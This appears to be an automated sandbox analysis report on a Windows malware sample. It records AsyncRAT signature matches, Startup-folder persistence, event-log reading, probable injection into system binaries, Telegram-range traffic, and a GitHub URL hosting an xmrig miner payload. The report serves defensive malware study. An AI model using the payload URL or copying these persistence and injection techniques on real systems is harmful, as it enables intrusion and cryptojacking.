                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3897187473.0000023D06629000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: MSBuild.exe, 0000001B.00000002.2296563820.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe
                  Source: svchost.exe, 00000007.00000003.1469891074.0000023D06F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49732 version: TLS 1.2

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\Payaret
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\Payaret
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\Payaret
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\Payaret

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000003.00000002.3891974556.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3C202C NtQuerySystemInformation,StrCmpNIW,12_2_000002109C3C202C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3C28C8 NtEnumerateValueKey,NtEnumerateValueKey,12_2_000002109C3C28C8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3C2B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,12_2_000002109C3C2B2C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3C27FC NtEnumerateKey,NtEnumerateKey,12_2_000002109C3C27FC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB6328C8 NtEnumerateValueKey,NtEnumerateValueKey,23_2_00000200AB6328C8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB632B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,23_2_00000200AB632B2C
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_0000000140001394 NtAlpcCancelMessage,41_2_0000000140001394
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CE928C8 NtEnumerateValueKey,NtEnumerateValueKey,42_2_000001932CE928C8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3C2B2C: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,12_2_000002109C3C2B2C
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC256D790_2_00007FFAAC256D79
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC2565A80_2_00007FFAAC2565A8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC25FA600_2_00007FFAAC25FA60
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC25D4F50_2_00007FFAAC25D4F5
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC2565C80_2_00007FFAAC2565C8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC257F280_2_00007FFAAC257F28
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeCode function: 0_2_00007FFAAC25E2B00_2_00007FFAAC25E2B0
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB1544A82_2_00000142DB1544A8
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB14DCE02_2_00000142DB14DCE0
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB142B2C2_2_00000142DB142B2C
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB40D0E02_2_00000142DB40D0E0
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB4138A82_2_00000142DB4138A8
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB401F2C2_2_00000142DB401F2C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_016657783_2_01665778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_0166C7E83_2_0166C7E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_0166BA983_2_0166BA98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_01664EA83_2_01664EA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_01664B603_2_01664B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_01660C003_2_01660C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_01666E283_2_01666E28
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A011F2C4_2_000001F28A011F2C
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A0238A84_2_000001F28A0238A8
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A01D0E04_2_000001F28A01D0E0
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A042B2C4_2_000001F28A042B2C
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A0544A84_2_000001F28A0544A8
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A04DCE04_2_000001F28A04DCE0
                  Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000023D0748DCE07_2_0000023D0748DCE0
                  Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000023D074944A87_2_0000023D074944A8
                  Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000023D07482B2C7_2_0000023D07482B2C
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC249DB08_2_00007FFAAC249DB0
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC24897D8_2_00007FFAAC24897D
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC24B1D18_2_00007FFAAC24B1D1
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC24ACA08_2_00007FFAAC24ACA0
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC2434D38_2_00007FFAAC2434D3
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC24335E8_2_00007FFAAC24335E
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeCode function: 8_2_00007FFAAC2434188_2_00007FFAAC243418
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_0040198012_2_00401980
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3A38A812_2_000002109C3A38A8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C39D0E012_2_000002109C39D0E0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C391F2C12_2_000002109C391F2C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3C2B2C12_2_000002109C3C2B2C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3D44A812_2_000002109C3D44A8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3D610012_2_000002109C3D6100
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3D610012_2_000002109C3D6100
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3D60E812_2_000002109C3D60E8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3CDCE012_2_000002109C3CDCE0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3D621812_2_000002109C3D6218
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE54307C16_2_00007FF7FE54307C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE541E7416_2_00007FF7FE541E74
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE545ED016_2_00007FF7FE545ED0
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC256D7920_2_00007FFAAC256D79
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC25FE6020_2_00007FFAAC25FE60
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC27887020_2_00007FFAAC278870
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC25126C20_2_00007FFAAC25126C
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC26724020_2_00007FFAAC267240
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC25D4F520_2_00007FFAAC25D4F5
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC260FFA20_2_00007FFAAC260FFA
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeCode function: 20_2_00007FFAAC25E2B020_2_00007FFAAC25E2B0
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC249DB021_2_00007FFAAC249DB0
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC2555A921_2_00007FFAAC2555A9
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC25259921_2_00007FFAAC252599
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC24B1D121_2_00007FFAAC24B1D1
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC252A2121_2_00007FFAAC252A21
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC253EBA21_2_00007FFAAC253EBA
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC24ACA021_2_00007FFAAC24ACA0
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC2434D321_2_00007FFAAC2434D3
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC24335E21_2_00007FFAAC24335E
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAAC24341821_2_00007FFAAC243418
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeCode function: 21_2_00007FFAACBA000121_2_00007FFAACBA0001
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200A98C1F2C23_2_00000200A98C1F2C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200A98D38A823_2_00000200A98D38A8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200A98CD0E023_2_00000200A98CD0E0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB632B2C23_2_00000200AB632B2C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB64610023_2_00000200AB646100
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB64610023_2_00000200AB646100
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB63DCE023_2_00000200AB63DCE0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB6460E823_2_00000200AB6460E8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB6444A823_2_00000200AB6444A8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB64621823_2_00000200AB646218
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC2434D335_2_00007FFAAC2434D3
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC24335E35_2_00007FFAAC24335E
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC249DB035_2_00007FFAAC249DB0
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC24B1D135_2_00007FFAAC24B1D1
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC25566935_2_00007FFAAC255669
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC25265935_2_00007FFAAC252659
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC24F86835_2_00007FFAAC24F868
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeCode function: 35_2_00007FFAAC24ACA035_2_00007FFAAC24ACA0
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeCode function: 37_2_007D5A4137_2_007D5A41
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeCode function: 37_2_007D1E2F37_2_007D1E2F
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeCode function: 39_2_00BC5A4139_2_00BC5A41
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeCode function: 39_2_00BC278839_2_00BC2788
                  Source: C:\Users\user\AppData\Local\ServiceHub\msbuild.exeCode function: 39_2_00BC1E2F39_2_00BC1E2F
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_00000001400065AE41_2_00000001400065AE
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_00000001400065AE41_2_00000001400065AE
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_00000001400065AE41_2_00000001400065AE
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_00000001400065AE41_2_00000001400065AE
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEF7D0E041_2_000001DDEEF7D0E0
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEF838A841_2_000001DDEEF838A8
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEF71F2C41_2_000001DDEEF71F2C
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEFADCE041_2_000001DDEEFADCE0
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEFB44A841_2_000001DDEEFB44A8
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEFA2B2C41_2_000001DDEEFA2B2C
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CDDD0E042_2_000001932CDDD0E0
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CDE38A842_2_000001932CDE38A8
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CDD1F2C42_2_000001932CDD1F2C
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CEA610042_2_000001932CEA6100
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CEA610042_2_000001932CEA6100
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CE9DCE042_2_000001932CE9DCE0
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CEA44A842_2_000001932CEA44A8
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CEA621842_2_000001932CEA6218
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CE92B2C42_2_000001932CE92B2C
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: String function: 0000000140001394 appears 33 times
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 384 -p 432 -ip 432
                  Source: ohvrxt.exe.3.drStatic PE information: No import functions for PE file found
                  Source: utntwb.exe.3.drStatic PE information: No import functions for PE file found
                  Source: hgzxhw.exe.3.drStatic PE information: No import functions for PE file found
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeStatic PE information: No import functions for PE file found
                  Source: spczxf.exe.3.drStatic PE information: No import functions for PE file found
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameX326.exe4 vs SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1668704123.0000016EAAE50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEyemapowipuyacalariqo@ vs SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670390218.0000016EB3350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEyemapowipuyacalariqo@ vs SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000000.1435016108.0000016E98F62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOqohojurovayof< vs SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeBinary or memory string: OriginalFilenameOqohojurovayof< vs SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
